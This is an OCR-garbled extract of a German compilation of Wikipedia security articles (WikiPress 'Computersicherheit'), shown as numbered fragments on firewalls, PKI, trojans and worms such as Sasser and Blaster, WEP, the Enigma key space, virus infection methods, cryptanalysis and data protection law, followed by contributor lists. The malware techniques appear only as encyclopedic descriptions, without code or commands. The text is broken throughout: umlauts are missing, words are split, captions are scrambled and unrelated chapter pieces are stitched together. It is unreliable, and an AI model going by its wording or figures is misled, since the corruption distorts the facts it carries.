Home
WikiPress 7 Computersicherheit
Contents
1. ertrauen Vertrauen ee N nn f bs er u indirektes indirektes Vertrauen indirektes Vertrauen Vertrauen i Ho N e agave i direktes 4 indirektes p d direktes Vertrauen proach Vertrauen Vertrauen i EN i i oe DAREN indirektes Vertrauen FREMDER BE Abb 12 Schematische Darstellung eines Web of Trust 136 Web of Trust Schl sselaustausch Problem Zum Austausch verschl sselter Informationen stehen symmetrische und asymmetrische Verschl sselungsverfahren zur Verf gung Beim Einsatz symmetrischer Verfahren m ssen jeweils zwei Personen die vertraulich miteinander kommunizieren wollen einen geheimen Schl ssel vereinba ren bei n Teilnehmern also insgesamt n n n 1 1 Das ist besonders bei gro en Benutzergruppen wie z B im Internet un praktikabel Im Gegensatz dazu besteht der Schl ssel bei Public Key Verschl sselungsverfahren aus einem ffentlichen Teil den jeder kennen darf und einem privaten Teil der geheim gehalten wird Um einem ande ren Teilnehmer eine verschl sselte Nachricht schicken zu k nnen gen gt es dessen ffentlichen Schl ssel zu kennen Damit n Teilnehmer einander verschl sselte Nachrichten schicken k nnen m ssen insgesamt nur n f fentliche Schl ssel existieren und ausgetauscht werden Dabei muss aber sichergestellt werden dass dieser Austausch authen tisch ist also niemand einen eigenen ffentlichen Schl ssel f r den eines anderen ausgeben kann L
2. Software Host Firewall Software und Netzwerk Firewall Hardware Um gangssprachlich wird h ufig von Hardware oder Software Firewall ge sprochen Bei dieser Unterscheidung handelt es sich in erster Linie um eine nicht technische Definition Die Unterscheidung von Hard und Software Firewall ist technisch gesehen unsinnig Zu jeder Firewall geh rt Software und die muss auf Hardware ausgef hrt werden F lschlicherwei se werden dedizierte Router auf denen die Firewallsoftware ausgef hrt wird als Hardware Firewall bezeichnet Personal Firewalls werden oft als Software Firewall bezeichnet aber auf dem PC ausgef hrt Sie ben tigen also den PC als Hardware Netzwerk Firewall blicherweise wird ein Ger t Hardware Firewall genannt wenn es sich um ein spezifisches Produkt f r genau diesen Zweck handelt Es ist ein Ger t mit mehreren Netzwerk Schnittstellen und einer darauf laufenden Software welche haupts chlich als Firewall dient Die Hardwarekomponente hat im Regelfall drei Netzwerkschnittstel len an denen jeweils die zu trennenden Netze angeschlossen sind Die drei Schnittstellen werden aus Sicherheitsgr nden oft aber wegen der Netzstruktur und damit aus der konzeptionellen Notwendigkeit gew hlt damit gew hrleistet ist dass nur solche Pakete von einem Netz ins andere durchgelassen werden die von der Software als g ltig anerkannt werden Dabei unterscheidet man drei Netzwerkzonen das externe Netz WAN heu
3. Die Adopters 7 500 US Dollar Beitrag pro Jahr haben fr hen Zugriff auf die Spezifikationsentw rfe und auf andere nicht ffentliche Infor mationsquellen allerdings besitzen sie keine Stimmrechte F r Unter nehmen mit weniger als 100 Mitarbeitern erm igt sich der Mitglieds beitrag auf 1 000 US Dollar pro Jahr Mitglieder der Contributors 15 000 US Dollar Beitrag pro Jahr d r fen dar ber hinaus an den Arbeitsgruppen die neue Spezifikationen entwickeln mitwirken Au erdem d rfen sie zwei Vertreter aus ihrer Mitte bestimmen die diese Gruppe im Vorstand Board of Directors vertreten wo sie aktiv an Entscheidungen beteiligt werden Die exklusive Gruppe der Promoters 50 000 US Dollar Beitrag pro Jahr verf gt ber feste Sitze im Vorstand entscheidet ber die Auf nahme neuer Firmen in diese Gruppe und trifft Entscheidungen ber 124 Trusted Computing Group nderungen der Organisationsstruktur Mitglieder sind die oben er w hnten sieben Firmen Dar ber hinaus wurde seitens der TCG ber die Schaffung weiterer Mit gliedsformen nachgedacht um auch dem wissenschaftlichen Sektor einen kosteng nstigen Zugang zu erm glichen Als Ergebnis dieser berlegun gen wurde ein so genanntes Liaison Program eingef hrt das interessier ten Organisationen wie z B Universit ten eine kostenlose Mitgliedschaft allerdings ohne Stimmrecht erm glicht Schlie lich hat die TCG noch ein unabh ngig besetztes Advisory Co
4. PPTP und L2TP ohne IPsec sollten nicht verwendet werden da sie als unsicher gelten Viele moderne Betriebssysteme enthalten Komponenten mit deren Hilfe ein VPN aufgebaut werden kann Linux enth lt seit Kernel 2 6 eine IP Sec Implementierung ltere Kernel ben tigen das KLIPS IPSec Kernel modul das von Openswan und strongSwan zur Verf gung gestellt wird Auch BSD Cisco IOS und Windows sind IPSec f hig Quelle http de wikipedia org wiki Virtual_Private_Network Historie 30 5 03 Anonym angelegt danach bearbeitet von den Hauptautoren Fabian Bieker JakobVoss Sebastian Hagedorn Andreassteffen DatenPunk Kubieziel Karl Henner Kurt Jansson Cyper Zwobot Steven Malkovich Tomte Paddy MichaelDiederich Thomas Willerich Achim Raschka Wst FlaBot Sparti Hunter Botteler Mvb Joerglauer Stern anonym 12 1 06 1 2 06 WikiPress Redaktion Priifsumme In der Informatik ist eine Priifsumme engl checksum eine einfache Ma nahme zur Gew hrleistung von Datenintegrit t bei der Daten ber mittlung oder speicherung Sie wird haupts chlich bei der Datensiche rung und bei Netzwerkprotokollen benutzt 257 WLAN Es gibt verschiedene Pr fsummenverfahren Die einfachen Verfahren lau fen stets nach einem gleichen Schema ab Es werden Bits Bytes oder eine andere grundlegende Komponente von Daten einer Nachricht mit einem bestimmten Faktor multipliziert und anschlie end der Reihenfolge nach aufsummiert Der sich ergebe
5. Sonstige Themen Den Begriff der unerw nschten Werbung hat die Rechtsprechung mitt lerweile definiert Dabei ist Werbung immer dann unerw nscht wenn sie au erhalb einer bestehenden Gesch ftsbeziehung versandt wird oder keine Zustimmung des Empf ngers vorlag bzw zu mutma en war Die Einwilligung des Empf ngers in k nftige Werbesendungen wird prak tisch h ufig ber nebul se AGB zum Beispiel bei Preisausschreiben oder Foren Registrierungen erschlichen Das gemutma te Interesse des Emp f ngers soll es dem Absender erm glichen Gesch fte anzubahnen Es liegt im legitimen Interesse eines Unternehmers neue Kunden gewinnen zu wollen Allerdings setzt die Rechtsprechung strenge Ma st be an das gemutma te Interesse um es nicht zu einem Freibrief f r unlautere Ver sender von Werbe E Mails verkommen zu lassen Die Begr ndung f r die Mutma ung muss individuell also f r jeden Empf nger schl ssig vor getragen werden Der Absender der Werbung ist dabei beweispflichtig Insofern trifft ihn eine Beweislastumkehr Technische Voraussetzungen f r E Mail Spam Um unerw nschte E Mail Werbung zu versenden wird softwareseitig lediglich ein Mail Trans fer Agent ben tigt als Hardware reichen ein einfacher Internetzugang und ein durchschnittlicher Rechner v llig aus Die Werbung muss dann im Prinzip nur einem Open Relay also einem schlecht konfigurierten Mail server bergeben werden Dabei reicht es aus diesem Rechner alle Emp
6. berpr fung von Zertifikaten in Echtzeit erm glicht Dokumente Eine PKI f hrt eines oder mehrere Dokumente in denen die Arbeitsprinzipien der PKI beschrieben sind Kernpunkte sind der Registrierungsprozess Handhabung des Secret Key Materials zentrale oder dezentrale Schl sselerzeugung technischer Schutz der PKI Syste me sowie eventuellen rechtliche Zusicherungen In X 509 Zertifika ten kann das CPS in den Extensions eines Zertifikates verlinkt werden Nachfolgende Dokumente sind teilweise blich CP Certificate Policy In diesem Dokument beschreibt die PKI ihr Anforderungsprofil an ihre eigene Arbeitsweise Es dient einem Dritten zur Analyse der Vertrauensw rdigkeit und damit zur Auf nahme in dem Browser CPS Certificate Practice Statement Hier wird die konkrete Um setzung der Anforderungen in die PKI beschrieben Dieses Doku ment beschreibt die Umsetzung der CP PDS Policy Disclosure Statement Dieses Dokument ist ein Auszug aus dem CPS wenn das CPS nicht ver ffentlich werden soll Eine PKI bietet ein hierarchisches G ltigkeitsmodell an Wird einer Certi ficate Authority vertraut wird damit allen von ihr signierten Zertifikaten auch vertraut Dadurch dass eine PKI untergeortnete PKIs haben kann Mehrstufigkeit wird auch allen untergeordneten PKIs vertraut Problematisch ist bei PKI Systemen dass Computer Programme be reits mit einer Vielzahl von Root Zertifikaten ausgeliefert werde
7. com scr bat oder pif haben Da z B das Betriebssystem Windows dem Benutzer je doch nach standardm iger Konfiguration keine Dateinamenerweiterun gen anzeigt kann ein Trojanisches Pferd als Datei beliebiger Art maskiert sein Viele ausf hrbare Dateiformate erlauben zus tzlich das Zuordnen von Icons zu einer Datei so dass eine schadhafte Datei Bild jpg exe dem Benutzer nicht nur namentlich als Bild jpg angezeigt w rde sondern auch noch das Icon eines Bildes haben k nnte und somit bei der oben genannten Windows Konfiguration auf den ersten Blick nicht von einer ungef hrlichen Bilddatei zu unterscheiden w re Da vielen Benutzern die M glichkeit dieser Maskierung nicht gel ufig ist werden Trojanische Pferde h ufig unbemerkt ausgef hrt 73 Viren W rmer Trojaner Schema der Infektion durch ein Trojanisches Pferd Trojanische Pferde k nnen entweder ber Datentr ger gezielt auf einen PC bertragen werden oder im Internet z B in Tauschb rsen versteckt in angebotenen Dateien an beliebige Teilnehmer verteilt werden Nach dem Programmaufruf installieren sie ihre Schadroutine im Hintergrund und sorgen daf r dass sie beim erneuten Start des Computers automatisch wieder aktiviert werden Autostart Oftmals haben die Schadroutinen Dateinamen die es schwer machen sie von Systemdateien zu unterschei den Sie befinden sich in un bersichtlichen Verzeichnissen wie z B im Systemordner von Windows Die Schadroutine ist na
8. finden und folgt Sasser nach um die neu befallenen Rechner zu infizieren Man kann diese Infektion an einer Datei mit dem Namen wormride dllim Windowsverzeichnis erkennen Ist diese Datei vorhanden ist der Rechner mit beiden W rmern infiziert Sasser hat sch tzungsweise zwei Millionen Rechner infiziert Die bis her schlimmste Attacke durch den Wurm W32 Blaster der auch Lovsan genannt wird hatte nach Sch tzungen von Microsoft 9 5 Millionen Com puter infiziert und weltweit erhebliche finanzielle Sch den verursacht 69 Viren W rmer Trojaner Der 19 j hrige Entwickler der Computerwtirmer wurde am 8 Juli 2005 vom Jugendsch ffengericht des Landgerichts Verden zu einer Jugendstrafe von ei nem Jahr und neun Monaten auf Bew hrung verurteilt Zudem muss Sven Jaschan 30 Stunden gemeinn tzige Arbeit in einem Krankenhaus oder Alten heim leisten Vermutlich wurde der Autor von seinen Freunden verraten um die von Microsoft ausgesetzte Belohnung von 250 000 Dollar zu erhalten Quelle http de wikipedia org wiki Sasser Historie 2 5 04 Angelegt von Antiara danach bearbeitet von den Hauptautoren Jofi Igelball ALE Antiara Verdi Avatar Hoch auf einem Baum Slomox Simeon Kienzle MichaelDiederich Peterlustig MilesTeg Head MAK Joscha Stefan K hn Keno Fredstober Mahaccc Zwobot Stf Steven Malkovich DerGrosse Madzero Ilja Lorek Ameins Kaktus anonym 12 1 06 1 2 06 WikiPress Redaktion W32 Blaster W32 Blast
9. funktion erst vom Benutzer aktiviert werden wenn sie ben tigt wird Mithilfe der Rechtetrennung des Betriebssystems l sst sich die Schutzwirkung einer Desktop Firewall erh hen Wird zum Surfen im Internet ein eingeschr nktes Benutzerkonto verwendet l uft Schadsoft ware die dabei unbeabsichtigt ausgef hrt wird ebenfalls nur mit einge schr nkten Rechten und kann die Konfiguration der Personal Firewall nicht manipulieren Viele Hersteller raten vom Betrieb lu von mehr als einer Personal Firewall z m auf einem Rechner ab da sich diese ge LASS Semomius EX ra er z Status Events Poscy genseitig behindern k nnen und daher sating ouvoundtrattic poley die Schutzwirkung verloren geht Setzt c Permissive by defaut blockist trafic man eine andere Personal Firewall ein peeraa aste empfiehlt Microsoft die bei Windows XP Service Pack 2 mitgelieferte Win dows Firewall deaktivieren Bei der Konfiguration einer Personal Firewall kann man nach verschiedenen tow saraca Por For Grundhaltungen vorgehen Erlaubt en ist alles was nicht ausdr cklich ver boten ist oder Verboten ist alles was Abb 9 Firestarter wurde f r ausgehenden nicht ausdr cklich erlaubt ist Letztere Datenverkehr nach einer Restriktiven Grundhaltung konfiguriert Grundhaltung gilt als sicherer ist aber schwieriger zu konfigurieren F r unerfahrene Benutzer wirkt es oft verwirrend wenn f r unbekann te Prozesse nach einer Regel verlangt w
10. geln als auch die Integrit t der Daten sicherstellen Aufgrund verschiede ner Schwachstellen wird das Verfahren als unsicher angesehen 247 WLAN Funktionsweise Generell handelt es sich um eine einfache XOR Verkn pfung des Bit stroms der Nutzdaten mit einem aus dem RC4 Algorithmus generierten pseudozuf lligen Bitstrom Quelle Ciphertext Ziel Daten Keystream Keystream Daten 0 1 1 1 0 1 1 0 1 1 0 1 1 1 0 X o 1 0 4 xr gt Q XOR hei xR gt 8 E ql o 0 0 0 0 0 0 1 1 1 0 1 0 1 0 1 5 i 3 v _ jf nl Abb 25 Ein Ciphertext wird bertragen Das WEP Protokoll verwendet den RC4 Algorithmus als Pseudozufalls zahlengenerator PRNG bei der Erzeugung eines Keyframes der einen Schl ssel und einen Initialisierungsvektor als Eingabe erh lt F r jede zu sch tzende Nachricht M wird ein neuer 24 bit langer Initialisierungsvek tor IV gebildet und mit einem Schl ssel K verkn pft der allen Stationen im Basic Service Set bekannt ist Das Ergebnis dient als Eingabe f r den RC4 Algorithmus welcher daraus einen Keyframe erzeugt Zus tzlich wird mittels CRC ein vermeintlich sicherer Integrit tspr fwert Integrity Check Value ICV berechnet und an die Nachricht M angeh ngt Die resultierende Nachricht M ICV wird mit dem Keystream RC4 IV K des RC4 Algorithmus XOR verkn pft und der Initialisierungsvektor IV wird dem resultierenden Ciphertext vorangestellt Die Abbildungen auf der folg
11. ternet Explorer IE und Outlook Express sind hier zu nennen Sie sind die am h ufigsten von Sch dlingen angegriffenen Anwendungen da sie extrem weit verbreitet und in den Standardeinstellungen leicht angreifbar sind Die zur Zeit bedeutendsten Alternativen zum Internet Explorer sind Firefox sowie Opera die beide mehr Sicherheit versprechen Bei sonstigen Betriebssystemen F r Betriebssysteme wie Mac OS X GNU Linux oder die Betriebssysteme der BSD Reihe sind momentan kei ne Viren verbreitet die f r den Benutzer eine Gefahr darstellen k nnten Es gibt zwar Viren f r diese Betriebssysteme jedoch kommen diese in 26 Computervirus der freien Wildbahn praktisch nicht vor und k nnen sich auf Grund von z B Rechtetrennung im Normalfall nicht stark verbreiten Das bedeutet jedoch nicht dass Benutzer dieser Systeme immun sind Personal Firewall Personal Firewalls zeigen gegen Viren keine Wir kung da ihre Arbeitsweise nichts mit der der Viren zu tun hat sondern eher auf W rmer passt Ihr Einsatz zum Schutz des Systems ist trotzdem empfehlenswert Antivirensoftware Antivirenprogramme sch tzen mit Ausnahmen nur vor bekannten Viren Daher ist es bei der Benutzung eines solchen Programms wichtig regelm ig die von den Herstellern bereitgestellten aktualisierten Virensignaturen einzuspielen Viren der n chsten Gene ration Tarnkappenviren k nnen von Antivirensoftware fast nicht mehr erkannt werden Mit Hilfe d
12. 2i 2 26 2i 1 2 me i l Diese Produktdarstellung lasst sich umformen in 26 2 n 26 2n Stecker M glichkeiten f r Gen oje le eo fo reserve Those or asossassco___ vtosrzo8o76 eo fe reroroisamnns aro oo fe Tns oro mo p ors o Bei der Enigma I wurden in der Regel genau zehn Steckerverbindun gen durchgef hrt F r diese ergeben sich nach der obigen Tabelle 150 738 274 937 250 150 Billionen Steckm glichkeiten entspricht 47 Bit Der Gesamtschl sselraum Der gesamte Schl sselraum einer Enigma I mit drei aus einem Vorrat von f nf ausgew hlten Walzen und einer von zwei Umkehrwalzen sowie bei Verwendung von zehn Steckern l sst 303 Kryptografie sich aus dem Produkt von 120 Walzenlagen 676 Ringstellungen 17 576 Grundstellungen und 150 738 274 937 250 Steckerm glichkeiten berech nen Er betr gt 120 676 17 576 150 738 274 937 250 214 917 374 654 501 238 720 000 das sind etwa 2 149 10 M glichkeiten und entspricht ungef hr 77 Bit Der Schl sselraum ist riesig gro und h lt auch einem Vergleich mit modernen Verschl sselungsverfahren stand Beispielsweise verf gt das ber mehrere Jahrzehnte gegen Ende des zwanzigsten Jahrhunderts zum Standard erhobene Verschl sselungsverfahren DES Data Encryption Standard ber einen Schl sselraum von genau 56 Bit also deutlich weni ger als die Enigma Auch der Nachfolger f r DES das AES Verfahren Ad vanced Encryption Standard
13. Aber auch ein Wurm kann wie ein Virus in vertrauensw rdigen Dateien getarnt integriert sein Tarnung und Verbreitung W rmer verbreiten sich derzeit meistens entweder automatisch ber E Mails oder ber Netzwerke Je mehr M glichkeiten ein Wurm hat sich weiterzuversenden umso erfolgreicher kann er sich verbreiten Verbreitung per E Mail Der Wurm verschickt eine Kopie von sich als E Mail Anhang Der Inhalt der E Mail zielt darauf ab den Empf nger zu veranlassen den Anhang zu ffnen und somit eine Infektion auszul sen Social Engineering Verschiedene Techniken dienen der Tarnung des gef hrlichen Anhangs Daneben gab es auch E Mails die auf Sicherheits l cken im verbreiteten E Mail Programm Microsoft Outlook Express ab zielten Hier wurde die Schadsoftware als E Mail Anhang versendet und ohne Zutun des Benutzers durch Outlook Express gestartet Automati sches Ausf hren Im Folgenden einige zurzeit bekannte Methoden Tarnung durch doppelte Dateinamenserweiterung Wurmprogramm dateien werden mit doppelter Dateinamenserweiterung versehen wobei darauf gebaut wird dass beim Empf nger die Anzeige der Dateinamen erweiterung ausgeblendet wird Windows Standardeinstellung So wird beispielsweise das ausf hrbare Wurmprogramm music mp3 exe unter Windows nur als music mp3 angezeigt und erscheint dem Opfer somit als harmlose Musikdatei Das ffnen dieser Datei verursacht allerdings nicht das erwartete Abspielen
14. Au er einem kleinen Zeitverlust merkt der Benutzer nicht dass ein Virus gerade aktiv wurde da die Wirtsdatei vollkommen arbeitsf hig ist Appender Ein Appender Virus f gt sich an das Ende einer zu infi zierenden Wirtsdatei an und manipuliert die Wirtsdatei derart dass es vor dem Wirtsprogramm zur Ausf hrung kommt Nachdem das Virus aktiv geworden ist f hrt es das Wirtsprogramm aus indem es an den urspr nglichen Programmeinstiegspunkt springt Diese Virusform ist leichter zu schreiben als ein Prepender da das Wirtsprogramm nur mini mal ver ndert wird und es deshalb im Arbeitsspeicher nicht wieder herge stellt werden muss Da Appender einfach zu implementieren sind treten sie relativ h ufig auf Entry Point Obscuring Der Fachbegriff Entry Point Obscuring kurz EPO hei t bersetzt Verschleierung des Einsprungspunkts Viren die diese Technik benutzen suchen sich zur Infektion einen bestimmten 33 Viren W rmer Trojaner Punkt in der Wirtsdatei der nicht am Anfang oder am Ende liegt Da die ser Punkt von Wirt zu Wirt variiert sind Viren dieses Typs relativ schwie rig zu entwickeln da u a eine Routine zum Suchen eines geeigneten In fektionspunktes ben tigt wird Der Vorteil f r diesen Virentyp besteht darin dass Virenscanner die gesamte Datei untersuchen m ssten um EPO Viren zu finden im Gegensatz zum Erkennen von Prepender und Appender Viren bei denen der Virenscanner nur gezielt Dateianfang und e
15. Bitteloeschen Bjoern h Blah Blaite Blaubahn Blubba lutsch Bluec Bluie Bmr Bodo Thiesen Bodoppels Boerni Bohem Bombenleger Boris23 Bota47 Botteler Brain3112 Brandltom Brazzy Brego Brubacker Bruhaha Bubo bubo B hler Burri simon gmx net Busfahrer Buxul BWBot C L ser Calestyo Caliga Canubis Captain Crunch Captaingrog Caramdir Carbidfischer Carter666 Casc2282 Cat Ce Ce2 Centic Cepheiden Chad dy Challe CharlyK Chch Chd Cherubino Chevalier Chewey Chhanser Chobot Chotaire Chr Franke Chris3k Chrisbra Chrisfrenzel Chrislb Christian Arntzen Christian Grothe Christia nErtl ChristianGlaeser Christoph D Christoph Neuroth Christoph B ChristophDemmer ChristophK Chrizz Chrkl Chrysalis Civvi Clemensfranz Cljk Clue4fun CMo Conny Conversi on script Cornholio Cornstar Cp trump Crux CSonic Csp Ctulhu Cvn65 Cws Cwshueba Cyc lonus Cyper Cyrusdreams Cyvh D D135 1r43 D235 Da DaB Daboss Dachris Dafi Dailer Dake DaMutz Daniel Daniel AT Daniel B Daniel Moser Daniel Wimpff Danielbaumann Daniel HL DanielP Danielwoe DarkDust Darkone DarkX2 Datenkeller DatenPunk DaTroll Dave81 David Hoeffer Dbenzhuser Dekar DELTAWULFF Delvey Dennis Density Der Ersteller Der fah rer Der Jurist Der Meister Derda Dergreg DerGrosse DerSchim Dersonlwd DestroyerHero De vanitator Devnull DgInsw D Generated DHN bot DiabolicDevilX Diago Diba Dick Tracy D
16. Da zus tzlich die MAC Adresse des Senders mit eingebunden wird ist sichergestellt dass ein gleicher Initialisierungsvektor bei verschiedenen Sendern zu unterschiedlichen RC4 Schl sseln f hrt Dar ber hinaus ver 253 WLAN wendet das TKIP Protokoll neben CRC als Pr fsumme mit dem Mes sage Integrity Check MIC einen zus tzlichen Hashwert Quelle http de wikipedia org wiki Temporal_Key_Integrity_Protocol Historie 5 7 04 Anonym angelegt danach bearbeitet von den Hauptautoren Inzane Wolfgang1018 Lofor Asb anonym 12 1 06 1 2 06 WikiPress Redaktion IEEE 802 1x IEEE 802 1x ist ein Standard zur Authentifizierung in Rechnernetzen Der Standard IEEE 802 1x stellt eine generelle Methode f r die Authenti fizierung und Autorisierung in IEEE 802 Netzen zur Verf gung Am Netz werkzugang einem physikalischen Port im LAN einem logischen IEEE 802 11 VLAN oder einem WLAN erfolgt die Authentifizierung durch den Authenticator der mittels eines Authentifizierungsservers RADIUS Ser ver die durch den Supplicant bermittelten Authentifizierungsinformati onen pr ft und gegebenenfalls den Zugriff auf die durch den Authenticator angebotenen Dienste LAN VLAN oder WLAN zul sst oder abweist Der Standard empfiehlt das Extensible Authentication Protocol EAP oder das PPP TLS Authentication Protocol zur Authentifizierung da keine eigenen Authentisierungsprotokolle definiert werden Betriebssysteme die IEEE 802 1x unterst
17. Dabei hat sich der Begriff so sehr eingeb rgert dass er als Bezeichnung f r die Berechnung von allgemeinen Kontrollbits bernommen wurde Quelle http de wikipedia org wiki Zyklische_Redundanzpr fung Historie 12 1 04 Angelegt von Ninjamask danach bearbeitet von den Hauptautoren Hubi Ukadow Terabyte Billen Christian Grothe Yankee51 Stern MKI Martin k Steven Malkovich 790 Pazz Toppe Fink Achim Raschka Thomas Springer Shmia MichaelDiederich FlaBot Sparti anonym 12 1 06 1 2 06 WikiPress Redaktion 266 Kryptografie Kryptografie Kryptografie bzw Kryptographie aus dem griechischen krypt s ver borgen und graphein schreiben ist die Wissenschaft der Verschl s selung von Informationen Geheimschrift und damit ein Teilgebiet der Kryptologie Im Gegensatz zu Steganographie befasst sie sich nicht damit die Kommunikation an sich zu verschleiern sondern vor allem damit den Inhalt von Nachrichten f r Dritte unzug nglich zu machen Kryptografische Verfahren k nnen aber unter Umst nden f r die Stega nographie eingesetzt werden zum Beispiel indem die Adressen von Sen der und Empf nger verschl sselt werden Die moderne Kryptografie hat vier Hauptziele Vertraulichkeit der Nachricht Nur der gew nschte Empf nger sollte in der Lage sein den Inhalt einer verschl sselten Nachricht zu lesen Weiterhin sollte es nicht m glich sein Information ber den Nach richteninhalt zu erlangen beispielswe
18. Diese Methode ist auch bei moder nen Verschl sselungsverfahren sinnvoll wenn von der Verwendung eines relativ schwachen Passwortes ausgegangen werden kann Schon aufhandels blichen Computern Stand 2005 k nnen ohne Wei teres mehrere hunderttausend Schl ssel pro Sekunde ausprobiert werden Ein halbwegs ausger steter Angreifer kann mehrere Millionen Schl ssel pro Sekunde testen W rterbuch Attacke engl dictionary attack Alle Schl ssel aus spe ziell zu diesem Zweck angefertigten Passwortsammlungen werden nach einander durchprobiert Die Reihenfolge wird gegebenenfalls nach der Wahrscheinlichkeit ausgew hlt Diese Methode ist auch bei modernen Verschl sselungsverfahren sinnvoll wenn von der Verwendung eines re lativ einfachen Passwortes ausgegangen werden kann 273 Kryptografie Auch das Ausprobieren aller denkbaren W rter ist ohne weiteres m glich Bei einem aktiven Wortschatz von 50 000 W rtern pro Sprache k nnen selbst auf handels blichen Rechnern dutzende Sprachen innerhalb we niger Sekunden ausprobiert werden Ein einzelnes Wort als Schl ssel ist daher sehr unsicher Ciphertext Only Manchmal wird diese Methode auch als Known Ci phertext bezeichnet Der Angreifer kennt einen oder mehrere Geheimtex te und versucht mit deren Hilfe auf den Klartext beziehungsweise den Schl ssel zu schlie en Probable Plaintext Der Angreifer besitzt Geheimtext und hat Grund zu der Annahme dass dieser bestimmte Wortgru
19. F r die Kontrolle dessen Einhal tung ist die sterreichische Datenschutzkommission zust ndig deren gesch ftsf hrendes Mitglied derzeit Waltraut Kotschy ist Schweiz hnlich wie in Deutschland regelt das Datenschutzgesetz des Bundes den Datenschutz f r die Bundesbeh rden und f r den privaten Bereich auf die kantonalen Beh rden ist das jeweilige kantonale Daten schutzgesetz anwendbar Kontrolliert wird die Einhaltung des DSG im Bund SR 235 1 durch den Eidgen ssischen Datenschutzbeauftragten und sein Sekretariat Mo mentan wird diese Stelle durch Hanspeter Th r bekleidet 17 berblick F r die Kontrolle der Einhaltung der kantonalen Datenschutzgesetze sind die Kantone zust ndig Sie sind dem Eidgen ssischen Datenschutzbeauf tragten nicht unterstellt sondern kontrollieren unabh ngig Kirche In der Kirche hat Datenschutz eine sehr lange Tradition So wur den bereits 1215 n Chr Seelsorge und Beichtgeheimnis im Kirchenrecht schriftlich verankert In Deutschland gelten die Datenschutzgesetze von Bund und L ndern im Bereich der ffentlich rechtlichen Kirchen ein schlie lich Caritas und Diakonie nicht unmittelbar da die Kirchen dies bez glich ein Selbstgestaltungsrecht haben Heute sch tzt f r den Bereich der katholischen Kirche das kirchliche Gesetzbuch Codex Iuris Canonici CIC das Pers nlichkeitsrecht auf Schutz der Intimsph re in Canon 220 In der Evangelischen Kirche in Deutschland EKD gilt das Da
20. H ufig sind diese Trojanischen Pferde als n tzliche Programme getarnt be nutzen beispielsweise den Dateinamen einer n tzlichen Datei oder sind mit einem tats chlich n tzlichen Programm verbunden Der tats chliche Nut zen der Datei die ein Trojanisches Pferd enth lt kann beliebiger Art sein Durch Ausf hren einer solchen Datei wird ein Computer oft mit ei nem sch dlichen Dienst eines Trojanischen Pferdes infiziert Das Tro janische Pferd kann von diesem Zeitpunkt an beliebige Aktionen auf dem infizierten Computer durchf hren H ufig enthalten Trojanische Pferde Spionagefunktionen z B Sniffer oder Routinen die Tastatureingaben aufzeichnen so genannte Keylogger und Funktionen die es erm gli chen einen Computer unkontrolliert vom Anwender ber ein Netzwerk z B das Internet fernzusteuern Backdoors Urspr nglich waren Trojanische Pferde nicht daf r vorgesehen sich selbst zu verbreiten sondern wurden gezielt gegen einzelne Opfer einge setzt z B in der Wirtschaftsspionage Mittlerweile jedoch sind zahlrei che Mischformen der Malware bekannt die sich wie Computerwtirmer selbst verbreiten k nnen aber auch die Z ge von Trojanischen Pferden aufweisen Diese Entwicklung macht eine klare Unterscheidung schwer Tarnung von Trojanischen Pferden Da Trojanische Pferde auszuf h rende Programme sind Executables m ssen sie bei Microsoft Windows eine dementsprechende Dateiendung beispielsweise exe
21. ISBN 83 916651 1 9 Barth Wolfgang Das Firewall Buch Grundlagen Aufbau und Betrieb sicherer Netzwerke mit Linux Millin Verlag Poing 2004 ISBN 3 89990 128 2 Cheswick William R u a Firewalls and internet security Repelling the Wily Hacker Addison Wesley Boston Mass 2003 ISBN 0 201 63466 X Strobel Stefan Firewalls und IT Sicherheit Grundlagen und Praxis sicherer Netze dpunkt Verlag Heidelberg 2003 ISBN 3 89864 152 X Zwicky Elizabeth D u a Einrichten von Internet Firewalls Behandelt Unix Linux Windows NT O Reilly Beijing 2001 ISBN 3 89721 169 6 Quelle http de wikipedia org wiki Firewall Historie 2 9 02 Anonym angelegt danach bearbeitet von den Hauptautoren Fuzz Dafi Netzize Harald M hlb ck Matze6587 Flominator Rasterzeileninterrupt Brain3112 WikiCare Lopsterx MasterLR Stern Jailbird RabeRalf Zwobot Hieke TobiasEgg Csp Dominik Steven Malkovich OWeh Spawn Avatar RalfG Kradi FriedhelmW J mach wust Fomafix Musik chris DatenPunk Ponte Karmakingl01 Pierre gronau Hagbard Tsor MichaelDiederich anonym 12 1 06 1 2 06 WikiPress Redaktion Personal Firewall Eine Personal Firewall PFW auch Desktop Firewall ist eine Software die den ein und ausgehenden Datenverkehr eines PCs auf dem Rechner selbst filtert Dies soll dem Schutz des Computers dienen ihre Wirkung ist allerdings umstritten W hrend in der Newsgroup de comp securi ty firewall die Wirkung von Pers
22. Jed Gorgo ThomasSkora LudiKalell Mps Hansele Mpils Stefan506 Euripides RobotE Zotti MichaelDiederich Tibi Mcp anonym 12 1 06 1 2 06 WikiPress Redaktion 322 Anhang Gesamtautorenliste Surak tiger 1 1111 217 2501 3247 3st 3systems 45054 4Li3N51 790 Ablaubaer Abubiju ACB95FEA ipt aol com Achim Raschka AchimP Adaxl Addicted Admin Wiki Adomnan Agla rech AHoerstemeier AHZ Ai AK51 Aka AkaBot Akermit Akl ALE Alex Kulesa Alexander Meyer AlexR Alfred Grudszus Alfred Heiligenbrunner Alien Aljoscha Alkibiades Amaryllis klit zekleine Schwester Ameins Ammit Amogorkon Ams033 Amtiss Anathema Andilar Andimbot AND RE Andre Engels Andre Riemann Andrea Doria Andreas horn Hornig Andreas S Andre as Hofmann AndreasB AndreasE AndreasPraefcke Andreassteffen Andrest Andromexus An drsvoss AndSi Andybear Angela Anneke Wolf Antiara Antifaschist 666 Anton Aporia Appa loosa APPER Aquin Araba Arbeo Archaeoraptor Arittner Arminho ArnoLagrange Arty Arved Asb Aschrage Askwar Asleif AT Atamari Aths Avatar Aycaramba Azor B N Badenserbub Baffclan Baikonur Bald BassD Bastic Batrox Baumanns Bbjoern Bdk Belz Bender235 Benji Benni B rmann Ben Zin Bera Berlin Jurist Bernburgerin Bernd Schmeling BerndGehrmann Bernhard Eder Bernhard55 Bert2 Betterworld Beyer BeziehungsWeise Bib Bierdimpfl Billen Billsux Bio logisch Birger Fricke Bitnic
